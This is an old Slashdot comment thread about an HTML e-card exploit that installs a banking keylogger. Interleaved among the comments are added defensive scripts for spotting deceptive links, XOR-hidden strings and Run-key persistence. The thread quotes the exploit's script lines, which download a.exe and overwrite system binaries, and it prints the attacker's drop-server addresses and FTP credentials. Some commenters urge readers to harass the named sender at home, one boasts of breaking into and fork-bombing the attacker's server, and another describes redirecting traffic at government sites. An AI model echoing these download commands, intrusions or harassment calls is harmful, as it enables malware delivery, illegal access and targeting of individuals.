      Of course, if you don't use x86, you'd be pretty secure.

      --
      cpghost at Cordula's Web.
  94. Keep M$ Apologists Employed! Write more viruses! by gfecyk · · Score: 1

    > If you're going to have to replace most of
    > your application software and half your
    > peripherals to run as a regular user,
    > wouldn't it be easier to just replace your
    > operating system?

    People won't switch from what they've grown accustomed to. It's actually easier to replace hardware once, and certain applications once, than to replace an OS, notably across a whole enterprise. And it's actually easier to replace Win95/Win98 with Win2K than it is to replace it with XP, never mind any Linux distro or BSD.

    > Because then you'd keep Microsoft apologists
    > like him out of work.

    He hit the nail on the head there. :-) Only instead of patching Microsoft OSes I'd be patching Linux OSes and closing different IP ports. Same garbage, different OS.

    Sure, this keeps me in contracts. If people were really scared of Windows they'd all switch to OpenBSD. But they won't. They'll just secure their Windows desktops like the pros do.

    And I don't need M$ bugs to keep me employed - there are plenty of idiots out there writing viruses to keep me in work for years to come.

    --
    Use Evolution instead of Outlook? Bewa
  95. Sigh scare mongerer. by SmallFurryCreature · · Score: 2, Insightful
    Repeat after me. HTML RENDERING IS NOT HARMFUL. We are here on slashdot not the bloody bbc. All that rendering html in an email could do is send info that you read the email by opening a link to a server under a spammers. Yes this is undesirable since it allows them to verify a spammed address is alive.

    Nothing else. All the other troubles are due to the execution of scripts. If the various graphical email programs would just stick to rendering html and leave javascript and others untouched then there would be no email viruses. (well except for the ones launched through buffer overflows)

    So it would only require a little bit of thought to give people the "nice" look of html email without the security problems. Prohibit external links and only allow links to attached files (which since they are links without script can't be executed until the viewer clicks them) and you will even remove the privacy invasion. All the attractiveness of the web without the insecurity.

    Given all that why exactly was the execution of code added to email? There must have been a decision made at MS at sometime but anyone ever see the reasons for it?

    Oh and don't get me wrong. I hate html formatted emails since they are a pain to read on a remote shell. Sadly I am a linux geek and everyone else seems to disagree. No, other slashdotters do not matter, you are geeks too.

    --

    MMO Quests are like orgasms:

    You may solo them, I prefer them in a group.

    1. Re:Sigh scare mongerer. by turnstyle · · Score: 2, Informative
      "Repeat after me. HTML RENDERING IS NOT HARMFUL."

      No, you are wrong.

      A very simple example is an HREF that seems to be pointing to a trustworthy site, but really points elsewhere.

      In fact, Slashdot specifically includes defenses against such simple tricks.

      For example, http://www.TrustworthySite.com.

      In a plain text reader, it would be obvious that really links to http://www.NastyEvilDoer.com

      --
      Here's what I do: Bitty Browser & Andromeda
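
The mismatch described in the comment above, where the visible link text names one host and the href points at another, can be checked mechanically. This is an added example, not part of the original thread; the sample mail body is constructed from the two host names used in the comment.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Anchor text that itself looks like a URL or bare host name, i.e. text that
# makes a claim about where the link goes.
_URLISH = re.compile(
    r"^(?:https?://)?[a-z0-9-]+(?:\.[a-z0-9-]+)+(?::\d+)?(?:[/?#]\S*)?$", re.I)


def host_of(url):
    """Host a client would contact for `url` (lower-cased, port and userinfo dropped)."""
    url = url.strip()
    if "://" not in url:
        url = "//" + url          # let urlsplit treat scheme-less text as a host
    try:
        host = urlsplit(url).hostname
    except ValueError:            # malformed authority, e.g. unbalanced brackets
        return None
    if not host:
        return None
    host = host.rstrip(".")
    return host[4:] if host.startswith("www.") else host


class LinkAuditor(HTMLParser):
    """Collects (claimed_host, real_host, href) for anchors whose text lies."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self._check(self._href, "".join(self._text))
            self._href = None

    def _check(self, href, text):
        text = text.strip().rstrip(".,;:!")
        # Only absolute web links whose text names a host can be compared.
        if not re.match(r"https?://", href.strip(), re.I) or not _URLISH.match(text):
            return
        claimed, target = host_of(text), host_of(href)
        if claimed and target and claimed != target:
            self.findings.append((claimed, target, href))


def audit_links(html):
    auditor = LinkAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample: one deceptive link, one honest link, one link with neutral text.
SAMPLE_MAIL = """\
<html><body>
<p>You have received an e-card! View it at
<a href="http://www.NastyEvilDoer.com/card?id=1">http://www.TrustworthySite.com</a></p>
<p><a href="http://www.TrustworthySite.com/help">www.trustworthysite.com</a></p>
<p><a href="http://www.NastyEvilDoer.com/">Click here</a></p>
</body></html>
"""

if __name__ == "__main__":
    for claimed, target, href in audit_links(SAMPLE_MAIL):
        print(f"text claims {claimed} but link goes to {target}: {href}")
```

Links with neutral text such as "Click here" make no claim about a host, so this check passes them; a mail filter would treat those with a separate rule.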
  96. Apache hacked... by Ayanami+Rei · · Score: 1

    And when it gets hacked, it's usually because someone is using an extension that tries to do a lot, or isn't as popular as the default ones, or is non-standard.
    Go figure.

    --
    THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
  97. Re:I am a windows user by Anonymous Coward · · Score: 0
    I also use Linux, and I know Unix inside out.

    There's your problem. If you knew Unix inside and out, or even non-inverted (right side out), you'd have no problems.

  98. HTML email by phorm · · Score: 2, Insightful

    A lot of people are blaming this on allowing HTML in email, but the fact is that HTML is a *STATIC* language... it can't - or at least shouldn't be able to - hurt your PC.

    Now, by either having a parse exploit with the HTML (bad client coding), or allowing scripts (really poor security) then problems arise...

    Personally, I dumped Outlook a loooong time ago. Thunderbird is nice and not hard for most users to switch to, my primary beef is that it doesn't seem to have an option to block images but allow by sender/site - or to allow a particular message to be clicked to show images (some catalogues I get via subscription in my email have images I want to see)

  99. Re:Keep M$ Apologists Employed! Write more viruses by Anonymous Coward · · Score: 0

    Yeah, because I spend hours a week re-patching the continual stream of security updates that come out of kernel.org and apache.org. Most people aren't "scared" of windows because most people can't get past basic concepts like "double-clicking" and dragging things on the desktop, much less know how to "secure their Windows desktops". I've even met some of you "certified" windows types. Can't say I'd want to work with someone who can merely complete a memorizable test for a cash-in-exchange-for-a-certification. Oh well, you get paid by lemmings to do MS's dirty work. Hope you're happy. Meanwhile, some of us have things to actually "do" instead of wasting our time mucking around with today's security patch.

  100. Internal Layout of the Pentagon by Anonymous Coward · · Score: 0
    1. Re:Internal Layout of the Pentagon by Anonymous Coward · · Score: 0

      you serious? that's a .mil site - trust it?

  101. Tell me Mozilla doesn't do that. Or won't later. by gfecyk · · Score: 1

    > x.Open("GET", "http://adversting.co.uk/a.exe",0);
    > s.SaveToFile( "C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

    Go ahead and tell me Mozilla doesn't do this:

    > x.Open("GET", "http://adversting.co.uk/a.sh",0);
    > s.SaveToFile( "/usr/bin/su",2);

    or some variant of that. If it blocks that, then it's probably breaking some functionality that other users want.

    Speaking of breaking functionality in the name of security, here's a question: Why did Sun DOWNGRADE the Java 1.1 security standards from Java 1.0? Could it be because too many coders asked for it? If you can't do that code snip in Mozilla now, how long before some one else demands it?

    From another Vmyths rant:

    Guess what? Java or Linux or whatever comes next will create even more homogeneity at the session, presentation, and application layers. "Sure, Rob, but we'll sacrifice flexibility & functionality for safety when VaporOS v1.0 debuts." Ah, of course. Will VaporOS v1.1 downgrade its security specs like Java v1.1 did?

    --
    Use Evolution instead of Outlook? Bewa
  102. So why not visit the perpetrator? by BobzNKazoo · · Score: 1

    This seems like a pretty vicious email, so why haven't the cops visited the guy yet?
    Better yet, why not visit the perpetrator in person and educate him as to how some folks feel about this? According to the Peoplepages Phone Directory at http://directory.superpages.com he lives just east of Nashville, TN and mapquest will give you a map to his front door. Any slashdot folks in Nashville want to pay him a visit?
    The rest of us could just phone him at 3:00 in the morning.

    --
    When in doubt: procrastinate, accelerate or turn left.
    1. Re:So why not visit the perpetrator? by Anonymous Coward · · Score: 0

      Apparently class of '2000!

      http://www.apsu.edu/matthewsf/expolympics/expoev en twinners.htm

      http://www.geocities.com/CollegePark/Quad/4551/m jl ocal.html

  103. the correct plural of virus is "viruses" by Anonymous Coward · · Score: 0

    Not "viri" and not "virii". Stop pretending like you know Latin when you obviously don't. It makes you look stupid.

  104. Re:Redundant, I know. Don't run as Administrator. by beer_maker · · Score: 1
    Why are you trusting the users to run their own anti-virus updates? If you support an organization, why aren't you running your own anti-virus server?!

    --
    Hmmm. Your ideas are intriguing to me and I wish to subscribe to your newsletter.
  105. Re:e-cards by Anonymous Coward · · Score: 0

    So you're saying its not "the thought" but "the money they spent," that counts?

  106. I love that joke! by filmsmith · · Score: 1

    It's even funnier when the one posting it has a number HIGHER than that of the person he's replying to.

    fs

  107. Re:record reboot.... by Anonymous Coward · · Score: 0

    A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!

    Yeah, it's really amazing how much MSBlaster is still going around, I recently got a copy of XP (Yes, I have a linux box also, but I heard on /. that BSD is dead, so I don't have a box with that on it.), and I'm on a 26,400 dialup connection (no alt., sad, but true), and when I went on line to "activate" my copy of XP, the box was infected within the first minute!

    There wasn't even enough time to "activate" XP, I was blown away at how fast it got me!

    Fortunately, I have already scrubbed blaster from several of my less computer savvy friends' boxen, so it was a cinch to make mine "well" again.

    But under a minute on a slooow dialup connection, really gets me...

  108. Use Mozilla. by Futurepower(R) · · Score: 1

    Obviously, Mozilla. Don't turn off HTML, because there are no known exploits for Mozilla.

    1. Re:Use Mozilla. by jez9999 · · Score: 1

      Unfortunately, Mozilla's e-mail client does not allow for use of one Local Mail tree for all POP3 accounts.

      ( http://bugzilla.mozilla.org/show_bug.cgi?id=30057 )

    2. Re:Use Mozilla. by FluffyOne · · Score: 2, Informative

      It does. See here:

      http://bugzilla.mozilla.org/show_bug.cgi?id=44863#c66

      Unfortunately, there's no UI for this functionality yet.

      Ronny

  109. Analysis of the malicious a.exe by Anonymous Coward · · Score: 1, Informative

    I downloaded a.exe out of curiosity, and have been analysing it. The file contains a number of very interesting strings, which make it quite obvious that this program attempts to hijack the user's personal login information as they log in to various popular Internet banking services.

    The strings are (trivially) encrypted, by XOR'ing each character with 255. They make frightening reading. I have listed some of them below.

    Of particular interest are the five at the top. Seems as if the details are uploaded to one of two FTP sites, and the exploit may affect people using Opera as well as IE. Don't know how though - Opera has never seemed anywhere near as buggy.

    64.191.23.212 21 ircd thepassw0rd https
    http
    Internet Explorer
    Opera
    69.93.102.218 21 logi bbzaza123 hangseng
    HSBC
    bank
    ufjbank ... continues for 152 more of these.

    I tried to log in to those FTP sites, but no luck :(. I would have taken great delight in deleting the lists of account numbers that had undoubtedly accumulated.
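
The single-byte XOR described in the comment above (each character XORed with 255) is simple to undo during static triage. This is an added example, not part of the original thread: it extracts such strings from a blob and, going one step beyond the comment, recovers the key from a known plaintext when the key is not known in advance. The sample bytes are constructed here, the address in them is a documentation-range placeholder, and the minimum string length of 4 is an assumption.

```python
import re

XOR_KEY = 0xFF   # "XOR'ing each character with 255", per the comment above
MIN_LEN = 4      # assumed threshold; shorter runs are mostly noise

_PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
_IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def xor_bytes(data, key=XOR_KEY):
    """XOR every byte of `data` with a single-byte key."""
    return bytes(b ^ key for b in data)


def extract_xor_strings(blob, key=XOR_KEY):
    """Return (offset, text) for each run that decodes to printable ASCII."""
    decoded = xor_bytes(blob, key)
    return [(m.start(), m.group().decode("ascii"))
            for m in _PRINTABLE_RUN.finditer(decoded)]


def find_keys(blob, crib):
    """Single-byte keys under which the known plaintext `crib` occurs in `blob`."""
    return [k for k in range(256) if xor_bytes(crib, k) in blob]


def network_indicators(blob, key=XOR_KEY):
    """Decoded strings that look like dotted-quad IPv4 addresses."""
    return [s for _, s in extract_xor_strings(blob, key) if _IPV4.match(s)]


def _build_sample():
    """Constructed stand-in for a binary: filler bytes around XOR-255 strings."""
    filler = bytes([0x00, 0x7F, 0x80, 0xFF]) * 3
    plain = [b"Internet Explorer", b"Opera", b"192.0.2.10", b"21"]
    blob = filler
    for s in plain:
        blob += xor_bytes(s) + filler
    return blob


SAMPLE = _build_sample()

if __name__ == "__main__":
    print("candidate keys:", find_keys(SAMPLE, b"Internet Explorer"))
    for offset, text in extract_xor_strings(SAMPLE):
        print(f"{offset:#06x}  {text}")
```

The two-character port string in the sample falls below `MIN_LEN` and is not reported, which is the usual trade-off of a length threshold.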

    1. Re:Analysis of the malicious a.exe by Anonymous Coward · · Score: 1, Informative

      You forgot to mention some stuff:

      It installs a keylogger somewhere (windows\system, or application data\) and starts it as "ra32.exe".
      It logs stuff to C:\WINDOWS\SYSTEM\~key.log and C:\WINDOWS\SYSTEM\~post.log

      Nice you name the site though, hope the hoster has deactivated it already, because you don't want anyone to have that info...
      There are some other strings in it that display info on the build-process:
      "g:\!Work\__Current\$0000_FHooker_Chazer\Release\TrojWithHooker.pdb
      g:\!Work\__Current\$0000_FHooker_Chazer\Dll\Release\DLL.pdb"

      Concluding: this is no simple spammer, it's a criminal that has his eyes on money.

    2. Re:Analysis of the malicious a.exe by Anonymous Coward · · Score: 0

      > this is no simple spammer, it's a criminal that has his eyes on money.

      Too right. I did manage to log in to that site, and it was full of spamming software, email lists, and what I can only assume were lists of account numbers.

      However, I have done a nasty little number on it, deleting as many of the criminal's logs as I could and disrupting the operations of the things they had installed, which included a webserver and an ftp server. The machine has now been knocked off line by a fork bomb. Better to do that than let it carry on harvesting email addresses and account numbers.

      I just hope that the real sysadmin will notice the breakin now. He clearly hasn't been very good at keeping the machine up to date!

  110. Re:I hate ecards (Java/Javascript) by gruntled · · Score: 1

    Java uses a sandbox. But Javascript does not. Many gurus, like Ed Felten of Princeton, keep Javascript (which incidentally is not really related to Java; Javascript was named as a marketing ploy) turned off. I've tried that, but too many sites use JS.

  111. Outlook is the problem. by techno-vampire · · Score: 1

    Outlook has always been a mass of bugs held together by security holes. This isn't going to change because NanoLimp is more interested in giving lusers the point'n drool UI they want, rather than good programs. Not only that, there are more people looking for more security holes and more people exploiting them because most PC lusers use it. Why? Not because it's good; it isn't. They use it because it's there, and they have no idea that there are other email clients out there. As long as this continues, the easiest way to be safe is not to use Outlook; whatever other program you use will have holes -- no program is completely safe -- but nobody will be looking for them. Running with the herd is easy, and seems safe. In this case, it's the most dangerous thing you can do but most people will because it's easier than thinking for themselves.

    --
    Good, inexpensive web hosting
  112. Re:I am a windows user by Tarwn · · Score: 1

    OK, I run both, but let's do to one of my Windows Boxes what you do to your Linux box:
    1. Disable unnecessary services - darnit, I already did this and check only after major installs, but consider it ten minutes if you have to google any of them
    2. Configure iptables - Ok, not quite the same, but I installed norton and configured it to ask first on just about everything
    3. Updates - ok, this one took a while, luckily I had latest service packs handy already, which meant only 3 reboots for norton (argh)
    4. Hrm, didn't do this. But my firewall is blocking all traffic that is externally initiated, and only allowing certain trusted applications out. Outlook doesn't render HTML (this was by default in my 2003 install), IE is patched all the way up...etc etc

    As far as disabling IIS...no problem. Well, now I don't have ftp or www servers running, but my mail is still going out if that's what you were implying would break...? You realize that IIS is not required during installation, right?

    I agree that Outlook (and in fact IE) should not have access to WScript and CScript anymore than any browser should have access to its OS's scripting engine (running shell scripts for instance) BUT I also have to say that I have only ever had 2 viruses infect my machines, and one of those was from an Apache server for another popular tech website that had been cracked.

    But perhaps I should check CERT again, make sure SSH doesn't have a buffer overrun (dude, is it me or does every version start out with one of these? :P), etc.

    --
    Whee signature.
  113. you bounce apps that don't work? by Anonymous Coward · · Score: 0
    Go ahead, get the current version of AutoCad working, and post it here. I've got three or four mailing list managers that run only in admin mode, probably could use the same massaging.


    My current burr is QuickBooks Pro 2003. It's a Java app, nothing else. Portable across the OSes? No way, it runs in IE6 and nothing else and it has to be continuously connected to the internet. Now what fuckwit thought it a good idea to put financials on an exposed computer? Good thing no virus writer ever used or heard of Intuit.

  114. ASCII just as good! by letdownjournals · · Score: 1

    I don't see why people use html e-cards, when ASCII pictures of kitties, butterflies and tweety birds are JUST as cute.

  115. Payload by Bob+Ince · · Score: 4, Informative

    I'm amazed that no-one has yet posted an analysis of the final payload 'a.exe'.

    This decompresses and drops 'ra32.exe', 'lanext.dll' and 'lanman.dll' into the Application Data\Microsoft folder, and sets ra32.exe to run on startup through a HKCU\Software\MS\Win\CV\Run registry entry.

    These files act as a keylogger. When they see one of a built-in list of online bank sites being used, it logs keypresses for a bit and uploads the result via FTP to a server controlled by the attacker.

    Bizarrely, for me in Windows 2000, it also opens an alert box with the message 'timediff' every 60 seconds. Bug?
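
The persistence described in the comment above (files dropped under Application Data\Microsoft and started from a per-user Run entry) can be looked for in a registry export. This is an added example, not part of the original thread: it reads text in the format written by `reg export`, assumes the abbreviated key in the comment is the standard per-user Run key, and uses a constructed sample with a made-up user name and paths.

```python
import ntpath
import re

# File names reported in the comments on this page.
DROPPED_NAMES = {"ra32.exe", "lanext.dll", "lanman.dll"}
# Assumption: the comment's abbreviated key refers to the standard per-user Run key.
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

_SECTION = re.compile(r"^\[(.+)\]$")
_VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
_EXE = re.compile(r'^\s*(?:"([^"]+)"|(.+?\.(?:exe|com|bat|scr|dll)))(?=\s|$)', re.I)


def _unescape(s):
    """Undo .reg string escaping (\\\\ -> \\ and \\" -> ")."""
    return re.sub(r"\\(.)", r"\1", s)


def run_entries(reg_text):
    """Yield (name, command) for string values under the per-user Run key."""
    section = None
    for line in reg_text.splitlines():
        line = line.strip()
        m = _SECTION.match(line)
        if m:
            section = m.group(1)
            continue
        m = _VALUE.match(line)
        if m and section and section.lower() == RUN_KEY.lower():
            yield _unescape(m.group(1)), _unescape(m.group(2))


def suspicious_run_entries(reg_text):
    """Return (value name, executable path, reasons) for entries worth a look."""
    findings = []
    for name, command in run_entries(reg_text):
        m = _EXE.match(command)
        path = (m.group(1) or m.group(2)) if m else command
        reasons = []
        if ntpath.basename(path).lower() in DROPPED_NAMES:
            reasons.append("file name reported on this page")
        if "\\application data\\" in path.lower():
            reasons.append("autostart from user-writable Application Data")
        if reasons:
            findings.append((name, path, reasons))
    return findings


# Constructed sample; the last section shows that values outside Run are ignored.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"ra32"="C:\\Documents and Settings\\alice\\Application Data\\Microsoft\\ra32.exe"
"Updater"="\"C:\\Program Files\\Example\\updater.exe\" /background"

[HKEY_CURRENT_USER\Software\Example]
"Path"="C:\\Documents and Settings\\alice\\Application Data\\Microsoft\\lanext.dll"
'''

if __name__ == "__main__":
    for name, path, reasons in suspicious_run_entries(SAMPLE_REG):
        print(f"{name}: {path} ({'; '.join(reasons)})")
```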

  116. Cut them off at the source!!! by filekutter · · Score: 1

    I decided the info you posted was enough to warrant a bit of decisive action, so I sent a letter to WilTel with a link to the examination of the spam.. This was the reply... WOW, thanks for the expert analysis...I'll forward on to our Abuse Team and the sales VP who manages this account. Might at least hamper the Tennessee spammer a few minutes... :)))))

    --
    I call computer-illiteracy job security
  117. Mozilla's Stupid Dinosaur Splash Screen by BigBlockMopar · · Score: 1

    Secondly, the "stupid dinosaur splash screen" (which I loved) has been gone for about 4 release versions of Mozilla now, to be replaced with a hideously drab orange box with 'Mozilla' written in it. Now that we've compromised on an ugly splash screen, no one's happy. Hooray for attempting to pander to everyone!

    I loved the dinosaur splash screen, too. But I couldn't show those releases of Mozilla to my boss (a government manager type - think of Lumbergh in Office Space) - because it made Mozilla look like it was designed and built by 16-year-old virgins with anime posters on their walls.

    Now, with that dinosaur splash screen, can I honestly deploy Mozilla onto the desktops of dozens of judges, business CEOs, and lawyers who make >$5,000,000 a year? They won't take it seriously and will therefore resist it. At least the drab orange box looks like some sort of corporate logo that they'd see if they went for a drive around the suburbs of Palo Alto - it lends credibility.

    Think of people like Frasier Crane - he's a caricature of the middle-aged successful man, the sort of person who makes big purchasing decisions based on tastefulness rather than functionality. "I don't care if you say that I'll get e-mail viruses! I'm *not* going to stare at KMail all day! They don't even have a real spellchecker!"

    (NB. The lack of a real spellchecker was fixed in KDE 3.2.)

    This is the same sort of problem we have *everywhere* with open source, shareware and free software from Linux to Mozilla, and including things like AVI Preview (comes with Kazaa Lite) - tacky and stupid user interfaces lacking the same features as the Microsoft equivalent we're trying to replace.

    I've ranted about this a lot over the years.

    --
    Fire and Meat. Yummy.
  118. Windows 98 still supported by jwd630 · · Score: 1
    Windows 98 support was extended through 2006 "Windows 98 and Windows 98 Second Edition support was scheduled to end on January 16, 2004. However, continual evaluation of the Support Lifecycle policy revealed that customers in the smaller and the emerging markets needed additional time to upgrade their product. "

    In other words, customers who we were going to abandon looked like they might jump to Linux rather than buy XP; so we decided we would string them along for another couple of years until we can convince them that Longhorn "is the most secure version of Windows ever" TM

  119. There Goes The Neighbourhood by rixstep · · Score: 1

    Everyone's got good advice. Here organised crime makes an inroad into flaky MS technologies and to avoid a panic, people here and elsewhere advise turning off HTML, turning off JavaScript, turning off VBScript, abandoning LookOut, abandoning Internet Exploder...

    It's all good advice, but it's pretty damned late. The writing was on the wall way back in May 2000, when ILOVEYOU hit. It was obvious even then that the entire world was sleeping. And although suspicions are still high that ILOVEYOU was actually an accident, the damage was real.

    Half a year after ILOVEYOU, a concerned programmer decided to release a similar program into the wild, just to shake people up, and remind them that they hadn't learned a thing from the trauma half a year earlier.

    And it didn't help a bit.

    Today, with more holes in MS technology than openings in a fish net, the advice is still to turn off HTML, turn off JavaScript, turn off VBScript, abandon LookOut, abandon Internet Exploder...

    Will no one realise that something is very very wrong when a technology such as MS's can allow arbitrary execution of code through a layer that by definition is supposed to not be able to do this? Will no one realise that the error is not in activating bells and whistles, but in the design itself?

    MS is not going to survive. Only the criminals want this. Without millions of unprotected PCs out there, run by people who have no clue and can't be expected to, they're out of money.

    This Internet used to be a cool thing. When was the last time any of you could concentrate on that, and not on all these MS-inflicted woes?

    It's true, more than anyone can fully appreciate: the mongrels Bill Gates and Steve Ballmer ruined the neighbourhood.

  120. Re: This whole article is FUD. by davegust · · Score: 1

    The default security settings would have to be significantly loosened for any aspect of this exploit to work.

    None of the ActiveX controls used by this exploit (XMLHTTP, ADODB.Stream, Scripting.FileSystemObject, WScript.Shell) are marked "safe for scripting". This means the default security settings would not allow these controls to run from any web server -- even 127.0.0.1. You would have to significantly tweak your IE security settings for this weak excuse for an exploit to work.

    If an IE user is really paranoid of ActiveX, it's very easy to completely disable it. Unfortunately your browsing experience will look like Mosaic circa 1995.

  121. No to all Tip by JurgenThor · · Score: 0

    Well, I just went a googling to find a link to prove my claim (above), but a quick review found nothing. I'm sure I've seen those dialogs though!! I DID find stories lamenting the lack of a button, but give the tip of holding down 'shift' while clicking No. Apparently this means 'No to All', but only works in XP (sorry 98 users).

    --
    GENERAL PUBLIC SIGNATURE (GPS) Any replies (derivatives) of this post must also use the GPS
  122. Only load images you trust by chlorophyl · · Score: 1

    Disabling HTML mail is not an option for some people, so a compromise would be something like what Mac's Mail offers, which allows you to disable images in HTML messages. But, the nice part is that each message has a "Load Images" button - allowing you to load images on an individual basis, after you've glanced at the text and determined it isn't hostile mail.

  123. It is a virus, and it was known already.... by thrill12 · · Score: 1

    It's the Backdoor-CAY virus, as named by McAfee. See this article for a description by the person who originally found the virus.
    Sending the file to McAfee really helped :)

    --
    Slashdot: stuff for news, nerds that matter, matter for news, stuff that nerd
  124. FireFox Feedback by twentycavities · · Score: 1
    >stop what you're doing right now. Go download Firefox...

    I am not the parent poster, but I took your FF advice. Here is my critique (after 10 mins. of use):
    • Good
      • Looks nice! Not hideous like every other Mozilla I've used.
      • Good default toolbar setup. Very similar to my IE settings.
      • Tabbed browsing.
      • Options are more user friendly.
      • Bookmark manager
    • Bad
      • Doesn't run PopUpCop (IE plugin). I use PopUpCop to turn off/on GIF animation and Flash auto-start.
      • Smooth scrolling off by default.
      • Smooth scrolling slow.
      • The page I'm looking at right now (/. posting thing) looks a little off.
    The first thing on my "bad" list may be a deal-breaker, as I can't stand animations next to the text I'm trying to read. Anyway, nice to see Mozilla is finally, genuinely nice. Thanks for the tip.

    (Note: Typos/incoherency <- Tylenol)
    --
    Monstromart: Where shopping is a baffling ordeal
    1. Re:FireFox Feedback by danielsfca2 · · Score: 1

      Thanks for trying out Firefox!

      A tip that may prove helpful:
      Try using a UserContent.css file to block ads in any CSS-compliant browser. (i.e. any modern browser except IE). I know that this doesn't work for all ads, but it works for many. Also, a personal proxy, I hear, does an excellent job of blocking ads, which I think you'd agree are the majority of the annoying animated things. Hopefully more complete ad-blocking will come to Firefox soon. I'm pretty sure Mozilla proper does have more ad-blocking already implemented, so we'll see.

    2. Re:FireFox Feedback by Cecil · · Score: 1
      Ok, I tried to post this earlier, but Slashdot was doing its random 503 error.

      > Doesn't run PopUpCop (IE plugin). I use PopUpCop to turn off/on GIF animation and Flash auto-start.

      To turn off looping animations:

      Type about:config into the URL bar, double click on image.animation_mode (a search for 'anim' should return only that property) and set the value to one of the following:
      • none -- images will not animate, at all, ever.
      • once -- images will animate once, then stop on the last frame
      • normal -- the default, images animate and loop as requested by the webpage
      Irritating flash ads are handled by the famous Flash Click-To-View plugin.

      Enjoy using Firefox, or whatever Mozilla flavour you end up settling on.
  125. Put your money where your AutoCAD is. by gfecyk · · Score: 1

    > There are lots of things in windows that
    > require admin access, MS office 97 requires it

    KB 257643 and others like it cover Office 97 under Win2K and XP as restricted users - edits to security take care of those. Those are bugs in Office 97 apps, plain and simple. But then again, Office 97 isn't supported anymore.

    Sure, one Office 2000 applet (Photo Editor) requires a similar hack. It only needs doing once, and then Sysprep and Ghost are your friends in the enterprise.

    > AutoCAD does as well

    And Autodesk doesn't have a fix by this time? Like I explained: How long has it been? Four years at least? No Excuse. Autodesk has competitors.

    Someone asked me to make AutoCAD (whatever version it was) work as a restricted user. I charge C$30.00/hour for this work - take me up on it as you likely won't find cheaper. And if you want, I'll publish your paid work here.

    --
    Use Evolution instead of Outlook? Bewa
  126. I don't see what all the fuss is about... by ShadowSystems · · Score: 1

    I use Outlook Express 6 & MailWasher.
    Between the two, I don't download any piece of mail I don't want, don't view any HTML unless I choose to, and have *never* gotten a virus through my mail.

    Express allows you to read all email as text only (Tools|Options|Read [X]Read All Message In Plain Text), and I've got that set as a button on the menu bar so I can toggle between the two states with but a single mouse click.

    No images, no scripts, no buffer overflows, no viruses, no problem.

  127. Re:I am a windows user by gwayne · · Score: 1

    Think server environment, not desktop. IIS is required for one thing or another on just about every Win2K server in our domain. I've never used Norton firewall, and I hate patches that require reboots. Only the kernel requires that in Linux. And don't you love the way that Windows IP filtering is an all or nothing affair? Last time I checked, you couldn't specify individual interfaces.

  128. Re:I am a windows user by Tarwn · · Score: 1

    Ok, I see where you're coming from. Technically my home machines could be considered servers, but not by the same classification I think you're aiming for.

    I agree that software updates shouldn't necessitate reboots, and that's one of the few things I dislike about Norton products (and the bastard format they use for log files) even if it is only once every 6 months to a year.

    I guess I took the easy way out on filtering. I use Norton to do incoming and outgoing filtering on my main Windows box (2kserver) and ipchains on my Linux box, then top that all off with very weird rules in my switch. I used to not bother putting firewalls or filtering on my other machines (laptops etc) until I noticed recently that somehow I am getting people probing ports on them, despite the fact that the switch doesn't relay any traffic to anything higher than x.x.x.3 on my network...ah well.

    The best trick I have is just redirecting traffic from the switch instead of one of my machines. I just forward a bunch of offensive ports to one address on my Windows machine, which then turns around and sends a slightly modified version of the packet out to whatever ip address resolves from this week's target (fbi.gov, rr.com, whoever I feel should get off their butts and make someone stop trying to hit my machines). If nothing else maybe I'll scare off a few script kiddies who see traffic going out to one address and coming back from somewhere completely different :)

    --
    Whee signature.
  129. important stuff by Anonymous Coward · · Score: 0

    Art and beauty is defined by the eye of the beholder.

    The brown eye?